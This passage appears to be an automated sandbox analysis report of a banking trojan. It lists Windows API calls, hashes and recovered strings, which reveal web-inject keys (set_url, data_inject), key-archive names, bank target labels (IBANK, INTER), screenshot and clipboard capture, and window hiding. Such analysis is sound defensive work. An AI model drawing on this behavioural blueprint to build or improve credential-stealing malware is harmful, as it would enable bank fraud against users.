                                                                                                                                                                                                              • strstr.MSVCRT(00000000,013295CC,013295BC,set_url ,?,012F1A39), ref: 012F141F
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,013295D0), ref: 012F1439
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,013295D4), ref: 012F1453
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,013295D8), ref: 012F146D
                                                                                                                                                                                                              • strstr.MSVCRT(00000001,data_before), ref: 012F1497
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020), ref: 012F14B4
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F14BB
                                                                                                                                                                                                              • strstr.MSVCRT(-00000003,data_before,data_after,data_inject,data_before), ref: 012F15E4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F161C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F161F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F162C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F162F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB20,?,012F1A39), ref: 012F163A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                              • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                              • API String ID: 2387113551-2328515424
                                                                                                                                                                                                              • Opcode ID: ff7eef326bd84883a58df761090fc896f67c6cb0f244efc70787321f2b5354b5
                                                                                                                                                                                                              • Instruction ID: ac356ff1e2431e8655eb2b4b524ba77a0fcc9212baec1daee3610a568d51d043
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff7eef326bd84883a58df761090fc896f67c6cb0f244efc70787321f2b5354b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8A1C135A00352DFDB32DF3894587A6BFE5EF45314F18816CDA868B206EB72D619CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012FB1F0
                                                                                                                                                                                                                • Part of subcall function 012FB110: PathAddBackslashA.SHLWAPI(61C5C0AD), ref: 012FB137
                                                                                                                                                                                                                • Part of subcall function 012FB110: GetFileAttributesA.KERNEL32(?), ref: 012FB175
                                                                                                                                                                                                                • Part of subcall function 012FB110: PathFileExistsA.SHLWAPI(?), ref: 012FB1B9
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD), ref: 012FB238
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012FB2A0
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FB2AD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD,?,?), ref: 012FB2E7
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 012FB36A
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 012FB37E
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 012FB391
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 012FB3C0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD), ref: 012FB3CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FB3EE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012FB3F1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FB3FE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012FB401
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID: 5NT$61C5C0AD$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 2685098104-2040460267
                                                                                                                                                                                                              • Opcode ID: dfb1c4dea309e33f34af88c22ed011ce2fdfdc2c489f5099b2f158a488ba8382
                                                                                                                                                                                                              • Instruction ID: c70c81ae1119881701e7c538fc632aef1933ec7b67316d6ba444472ef3da0af3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfb1c4dea309e33f34af88c22ed011ce2fdfdc2c489f5099b2f158a488ba8382
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD51467054434A5BDB329F28D8A8FEABBE8EB46704F1441ACEB89D7242DA709548C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D098), ref: 01303920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303961
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0130396B
                                                                                                                                                                                                              • #680.SHELL32 ref: 01303973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01303984
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0130398B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013039BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 013039CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01303A10
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 01303A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 01303A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$#680AllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: \$path.txt$stf.zip
                                                                                                                                                                                                              • API String ID: 1623271082-487659054
                                                                                                                                                                                                              • Opcode ID: 44bc286902d069eeab0fea4d985ca4ef55d8027d63b55699d2ff3e9c27f9c5a6
                                                                                                                                                                                                              • Instruction ID: e286d9300c680b0c17702ce3f537cec2b9b323c4ae63b3d30cc1ff1248f8d2d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44bc286902d069eeab0fea4d985ca4ef55d8027d63b55699d2ff3e9c27f9c5a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3161D63050065A5FDB32DF289868BEB7BE8BF45708F544198E58AD7291DB709688CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileType.KERNEL32(?,00000000,00000000), ref: 01308899
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 013088B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleInformationType
                                                                                                                                                                                                              • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                              • API String ID: 4064226416-1748840775
                                                                                                                                                                                                              • Opcode ID: 9c250a12b1d5da4df994594c2c36eb4a31380dcb69c7bd6499824ec9a86ef244
                                                                                                                                                                                                              • Instruction ID: 9ec6b1a05fcb26f5f9c4cd1c503480ca01bbd0ad8c265b4affc03fc2c585af0d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c250a12b1d5da4df994594c2c36eb4a31380dcb69c7bd6499824ec9a86ef244
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9518171D00218ABEB25DFA8DC95BFEBBB8EB44705F104169FA04EB1C0D774A940CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 012F323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 012F325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012F327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 012F3286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 012F329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 012F32AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 012F32D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 012F32FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F3301
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000013), ref: 012F3311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 012F332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 012F3399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 012F33DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3472172748-4108050209
                                                                                                                                                                                                              • Opcode ID: a9be642ccfe4d7f0335851bd5f03d459f855c98679fa69bce802b5b744c8e829
                                                                                                                                                                                                              • Instruction ID: b19686b450fd00138e7e0e65d64d5597aaf5fb21dfbaa71033d45a9b3ddb759c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9be642ccfe4d7f0335851bd5f03d459f855c98679fa69bce802b5b744c8e829
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6451E231214312ABE731EF289C58FABBB9DFB86754F14422CFB4597284DB60DA04C7A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 012EC51C
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001), ref: 012EC53D
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012EC540
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 012EC545
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 012EC554
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 012EC567
                                                                                                                                                                                                              • GetClassNameA.USER32(00000000,?,00000101), ref: 012EC589
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 012EC5F5
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000EC,?), ref: 012EC617
                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 012EC626
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 012EC62F
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 012EC642
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 012EC64A
                                                                                                                                                                                                              • EnumChildWindows.USER32(00000000,Function_0000C4B0,00000000), ref: 012EC658
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 012EC661
                                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 012EC66F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClassLong$SleepVisible$AttributesChildDesktopEnumInfoLayeredNameProcessThreadWindows
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 4154023459-4251816714
                                                                                                                                                                                                              • Opcode ID: 05a7612c00bc470430ed10b792ce5907a5f35c9e22fc057bc79a62398512bd9a
                                                                                                                                                                                                              • Instruction ID: cec12d5c0b14b847a488e713ab9e6409f82729ce73baaaf27b37ec522e052a93
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05a7612c00bc470430ed10b792ce5907a5f35c9e22fc057bc79a62398512bd9a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4031B330660216AFE731AEA8EC4EFBE77ACEF45761F500118F715E20C4D7B49A118BA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7), ref: 012FF2F7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FF33B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF347
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF34B
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FF35C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF363
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012FF390
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FF39F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF3A5
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF3A9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FF3BA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF3C1
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 012FF3EF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 012FF405
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastPath$#680BackslashCreateDirectoryFolderMakeSystem$Sleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61C5C1E7$scrs
                                                                                                                                                                                                              • API String ID: 161959730-3422111203
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 0130057C
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01300592
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 013005A0
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013005A9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 013005C7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 013005D5
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00020420,00000000,00000000,00000000), ref: 013005EA
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 013005FB
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01300600
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01300614
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01300622
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C165), ref: 0130062D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C165,IBANK), ref: 01300647
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61C5C165$IBANK$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$P0Mw
                                                                                                                                                                                                              • API String ID: 2736094147-1605467058
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 013015AC
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 013015C2
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 013015D0
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013015D9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 013015F7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301605
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00021320,00000000,00000000,00000000), ref: 0130161A
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 0130162B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01301630
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01301644
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301652
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C387), ref: 0130165D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C387,INTER), ref: 01301677
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61C5C387$INTER$Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}$P0Mw
                                                                                                                                                                                                              • API String ID: 2736094147-1452232652
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4), ref: 012E3DED
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4), ref: 012E3E23
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4), ref: 012E3E57
                                                                                                                                                                                                              • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd;MMM;yyyy,?,00000104), ref: 012E3EA0
                                                                                                                                                                                                              • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH;mm;ss,?,00000104), ref: 012E3EC0
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,debug_%s_%s.log,?,?), ref: 012E3EE5
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4), ref: 012E3F37
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4), ref: 012E3FB7
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D3A4,00000000,?), ref: 012E404B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: EnterCriticalSection.KERNEL32(0132FB68,00000001,00000000,775B5CE0), ref: 012F39E9
                                                                                                                                                                                                                • Part of subcall function 012F39D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 012F39FB
                                                                                                                                                                                                                • Part of subcall function 012F39D0: _snprintf.MSVCRT(?,00000104,%s%s,01339D68,0133D3A4), ref: 012F3A1B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: SetCurrentDirectoryA.KERNEL32(?), ref: 012F3A2B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: PathAddBackslashA.SHLWAPI(?), ref: 012F3B00
                                                                                                                                                                                                                • Part of subcall function 012E79C0: SetFileAttributesA.KERNEL32(?,00000000,012E4067,0133D3A4,DEBUG), ref: 012E79C8
                                                                                                                                                                                                                • Part of subcall function 012E79C0: DeleteFileA.KERNEL32(?), ref: 012E79CF
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 012E4072
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BackslashPath$CurrentDirectoryFileFormat_snprintf$AttributesCriticalDateDeleteEnterFreeSectionTimeVirtual
                                                                                                                                                                                                              • String ID: DEBUG$HH;mm;ss$dd;MMM;yyyy$debug_%s_%s.log$scr.bmp$sysinfo.log
                                                                                                                                                                                                              • API String ID: 203013662-44577846
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012E6460
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?,00000000,00000103), ref: 012E647A
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,000000FF,?,00000000,00000103,?,00000000,00000103), ref: 012E6494
                                                                                                                                                                                                              • strtol.MSVCRT(774D0F10,00000000,00000010,00000000,00000000,774D0F10), ref: 012E650A
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,01326074,00000000,00000000), ref: 012E658A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$strstrstrtol
                                                                                                                                                                                                              • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                              • API String ID: 600650289-3097137778
                                                                                                                                                                                                              • Opcode ID: 2e81866e80abf6c2b2089491b6c4a99f5c0980ad164c5b231acc26a8e3b8b2cd
                                                                                                                                                                                                              • Instruction ID: 909b03552b5566922fd8b100d060409a612a7eebf0b604693c2b5e6f224e3c06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e81866e80abf6c2b2089491b6c4a99f5c0980ad164c5b231acc26a8e3b8b2cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D715A70A183555BDB31EF68DC85BDEBBF9AF68700F0480ACEA48A7285D3785745CB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32(00000000,00000000,774CF380,?,?,012E8212,00000000,00000000), ref: 012E833C
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,?,?,012E8212,00000000,00000000), ref: 012E8343
                                                                                                                                                                                                              • SetThreadDesktop.USER32(00000000,?,?,012E8212,00000000,00000000), ref: 012E834F
                                                                                                                                                                                                                • Part of subcall function 012EDA20: GetTickCount.KERNEL32(00000000,00000000), ref: 012EDA2D
                                                                                                                                                                                                                • Part of subcall function 012EDA20: HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 012EDA3E
                                                                                                                                                                                                                • Part of subcall function 012EDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,0132F5A0), ref: 012EDA6A
                                                                                                                                                                                                                • Part of subcall function 012EDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EDA83
                                                                                                                                                                                                                • Part of subcall function 012EDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,0132F54C), ref: 012EDAB0
